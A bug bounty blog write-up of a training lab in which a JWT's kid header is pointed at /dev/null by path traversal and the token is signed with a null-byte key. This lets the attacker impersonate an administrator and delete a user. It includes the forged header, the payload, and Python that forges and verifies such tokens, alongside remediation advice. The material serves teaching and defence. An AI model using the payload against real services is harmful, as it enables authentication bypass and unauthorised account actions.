Cracking JWTs: A Bug Bounty Hunting Guide [Part 5]
2025-6-8 05:40:37 Author: infosecwriteups.com

JWTs (JSON Web Tokens) are stateless tokens used for authentication. They are signed with either a symmetric HMAC key (HS256) or an asymmetric key pair (RS256), and the server verifies that signature before trusting any claim in the token and granting access.

The kid (Key ID) header is a hint to the server about which key to use when verifying the JWT signature. In a secure setup, this value should be matched against a static list of trusted key identifiers.

But when developers use the kid value directly to build a filesystem path and read the signing key from that file, an attacker can abuse it with path traversal and point it at /dev/null. The server then reads an empty key, and a token signed with a null-byte key verifies against it. That's exactly what this attack leverages.


In this write-up, we exploit a poorly implemented JWT validation mechanism that uses the kid header to load a key from the server's file system. By using path traversal to point the kid at /dev/null and signing the token with a single null byte (k = AA==, because the JWT Editor extension will not sign with an empty key), we impersonate the admin user and delete another user. 🧨

  • Lab: JWT authentication bypass via kid header path traversal
  • Account: wiener:peter
  • Goal: Access /admin as administrator and delete the user carlos

This ain’t your average PoC. We’re going full gladiator mode — step-by-step, raw hacking, no fluff.

📌 Tool of Choice: Burp Suite + JWT Editor Extension — aka Hacker’s Swiss Army Knife 🗿

1. Enter the Arena

Launch the lab and log in using your trusted duo: wiener:peter.

Screenshot 1

🪪 Credentials? Check. Lab loaded? Check. Adrenaline? Hell yeah.

2. Touch the Forbidden Door

Try accessing /admin. You’ll be stopped at the gate:

“Admin interface only available if logged in as an administrator.” 🛑 But guess what? We become the admin.

Screenshot 2

3. Intercept That Sweet Packet

Capture the /admin request in Burp and slam it into Repeater.

⏳ It's about to get spicy.

Screenshot 3

4. Blacksmith Forge: Null Byte Key

  • Go to JWT Editor > Keys > New Symmetric Key
  • Forge a new key like the cyberblacksmith you are.
  • Manually set the k value to AA== (Base64 for a single null byte) ☠️ That's right: we're signing this bad boy with a key that is, for HMAC purposes, the same as no key at all.

Screenshot 4

5. Prep the Payload

Head back to JWT tab in Repeater. Highlight the token. You’re now holding a digital grenade.

Screenshot 5

6. Mold the Header of Doom

  • In the payload, set sub to "administrator" (that's who we are now)
  • In the header, set kid to: ../../../../../../../dev/null

🎯 Precision path traversal — deep into the abyss.

Screenshot 6

7. Sign It Like a Legend

Click Sign, select the null-byte key, and tick Don’t modify the header. You’re not just modifying a token. You’re rewriting fate. 🗿🔥

Screenshot 7

8. Send It. Smash It. Own It.

Hit Send — and BOOM 💥 You’ve bypassed auth. You’re inside /admin.

No keys. No doors. Just brains and bytes.

Screenshot 8

9. Pull the Trigger on Carlos

Find the delete endpoint in the admin panel: /admin/delete?username=carlos

Change the request path in Repeater to that URL (keeping the forged token) and fire it off like a precision-guided cyber missile. 🧨 Carlos? Eliminated.

Screenshot 9

10. Confirm the Kill 🏁

Right-click → Show in Browser.

Paste that final URL — Mission Complete, hacker. 🧠💀

The app dynamically builds a file path from the kid value and reads the HMAC secret from that file. Pointed at /dev/null, it reads an empty key. That pairs perfectly with our token because HMAC right-pads any key shorter than the hash block size with zero bytes, so an empty key and a single 0x00 byte produce identical signatures. The server recomputes the HMAC with its "key", it matches ours, nothing throws, and we get admin powers.💥
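To make the mechanism concrete, here is an added Python model (not code from the write-up or from the lab) of the vulnerable verifier beside a hardened one, together with the forgery from steps 4 to 8 and the HMAC zero-padding property that makes the AA== key work. It also illustrates the remediation list at the end of the article. Everything in it is constructed for illustration: the key directory, the key name k1, the function names and the sample claims are assumptions, not the lab's real implementation. It assumes a POSIX system where /dev/null exists and reads as empty, and uses only the standard library.

```python
import base64
import hashlib
import hmac
import json
import os
import tempfile

# Constructed stand-in for the server's key material: one legitimate HS256 key, "k1".
# The hardened verifier keeps it in memory; the vulnerable one reads it back from disk.
KEYS = {"k1": os.urandom(32)}
KEY_DIR = tempfile.mkdtemp(prefix="jwt-keys-")
with open(os.path.join(KEY_DIR, "k1"), "wb") as fh:
    fh.write(KEYS["k1"])


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(header, payload, key):
    """Build a compact JWS: base64url(header).base64url(payload).base64url(HMAC-SHA256)."""
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url_encode(sig)}"


def _check_signature(h, p, s, key):
    """Recompute the HMAC over the signing input and return the payload if it matches."""
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if hmac.compare_digest(expected, b64url_decode(s)):
        return json.loads(b64url_decode(p))
    return None


def verify_vulnerable(token):
    """Mirrors the lab's bug: kid is joined onto a directory and the file is read as the key.
    No normalisation, no allowlist. Returns the payload on success, None on failure."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    key_path = os.path.join(KEY_DIR, header.get("kid", ""))  # path-traversal sink
    try:
        with open(key_path, "rb") as fh:
            key = fh.read()  # for ../../../dev/null this is b"" on POSIX systems
    except OSError:
        return None
    return _check_signature(h, p, s, key)


def verify_hardened(token):
    """Fix: kid is only ever a dictionary lookup into keys loaded at startup, and alg is pinned."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":
        return None
    key = KEYS.get(header.get("kid"))
    if key is None:
        return None
    return _check_signature(h, p, s, key)


def forge_admin_token():
    """The attack from the write-up: kid traverses to /dev/null, signature keyed with AA== (one null byte).
    Seven ../ segments are enough when the key directory sits at most seven levels below /."""
    header = {"alg": "HS256", "kid": "../../../../../../../dev/null"}
    payload = {"sub": "administrator"}
    return sign_hs256(header, payload, base64.b64decode("AA=="))


def hmac_keys_equivalent(key_a, key_b, message=b"probe"):
    """HMAC right-pads keys shorter than the block size with 0x00, so b"" and b"\\x00" are one key."""
    mac_a = hmac.new(key_a, message, hashlib.sha256).digest()
    mac_b = hmac.new(key_b, message, hashlib.sha256).digest()
    return mac_a == mac_b


if __name__ == "__main__":
    legit = sign_hs256({"alg": "HS256", "kid": "k1"}, {"sub": "wiener"}, KEYS["k1"])
    forged = forge_admin_token()
    print("empty key == null-byte key:", hmac_keys_equivalent(b"", b"\x00"))
    print("vulnerable, legit token  :", verify_vulnerable(legit))
    print("vulnerable, forged token :", verify_vulnerable(forged))
    print("hardened,   forged token :", verify_hardened(forged))
```

The difference between the two verifiers is a single design choice: the vulnerable one lets a header field choose *where* a key is read from, while the hardened one lets it choose only *which* of a fixed set of preloaded keys to use. Running the block also shows why the extension's AA== workaround is not a cheat: HMAC treats the empty key and the single null byte identically, so whatever the server reads from /dev/null, the forged signature matches.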

In a real-world scenario, this bug can lead to:

  • 🚨 Full authentication bypass
  • 🔐 Admin impersonation
  • 👻 Quiet exploitation (verification succeeds, so nothing fails loudly on the server side)
  • ⚡ Fast and automatable attack

It’s a critical issue, especially when JWT libraries are used without validating kid values or restricting file access.

// JWT Header
{
  "alg": "HS256",
  "kid": "../../../../../../../dev/null"
}

// JWT Payload
{
  "sub": "administrator"
}

// Signing Key (Base64 of a single null byte)
AA==
  • 🚫 Never trust a user-controlled kid header; treat it as an identifier, not a location
  • ✅ Sanitize and allowlist every input that touches your filesystem
  • 🔐 Don't load secrets dynamically from a path built at request time; load a fixed set of keys at startup and look kid up in that set
  • 💀 /dev/null is not harmless: in a weak setup, an empty key is a key the attacker already knows

This lab is an elegant example of how a null byte and path traversal can punch through your auth walls like butter. From user to admin — no brute force, no fancy exploit chain — just pure JWT misconfiguration fun 🧠🗿

If you’re a bug bounty hunter or pentester — always peek into JWT headers, especially when kid is involved. You never know what kind of mess you'll uncover.

And that wraps up another wild ride through the world of JWT misconfigurations. From null bytes to path traversal, we turned server logic inside out and walked out wearing the admin crown 👑.

Remember — hacking isn’t just about payloads and headers. It’s about mindset, creativity, and a little bit of controlled chaos.

So, whether you’re up late smashing Burp requests or sipping chai while scanning tokens…

Keep pushing boundaries. Keep breaking boxes. Keep hacking. Catch you in the next one, hacker. Until then…

#HappyHacking 🗿🔥💥


Source: https://infosecwriteups.com/cracking-jwts-a-bug-bounty-hunting-guide-part-5-2791be30bd17?source=rss----7b722bfd1b8d--bug_bounty